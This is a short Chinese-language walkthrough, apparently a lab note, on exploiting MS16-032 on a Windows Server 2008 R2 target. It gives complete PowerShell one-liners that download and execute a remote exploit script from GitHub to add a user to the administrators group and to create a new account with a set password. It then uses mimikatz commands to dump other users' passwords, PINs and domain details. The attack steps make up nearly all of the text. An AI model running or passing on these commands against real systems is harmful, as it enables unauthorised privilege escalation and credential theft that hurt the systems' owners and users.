MS16-032漏洞利用
靶机:Windows server2008R2
1、 创建标准用户。创建用户zhuzhuxia,此用户为普通用户。在cmd下使用net user zhuzhuxia可以看到在*user组中。
2、 提权。使用MS16-032漏洞,使用powershell一句话提权,将zhuzhuxia这个用户放到管理员组中去。利用脚本如下:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators zhuzhuxia /add'"
执行完命令后,有如下提示,说明提权成功。
再执行命令net user zhuzhuxia,zhuzhuxia这个用户已经归到管理员组。这时候就可以为所欲为了。
如下图所示。
此时还可以借助mimikatz工具来窃取本机其他账号和密码。使用管理员身份运行该程序。
打开mimikatz后,分别执行privilege::debug
sekurlsa::logonpasswords
执行完命令后,可以获取到其他用户和密码、PIN、所在域等信息.
PS:提权后执行某些进程或程序,如修改IP,需要输入密码访客执行,若不知道当前用户密码,可以执行命令创建用户sunwukong:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user sunwukong CVTE@123 /add'"
此用户为标准用户,可以再次使用步骤2提权即可。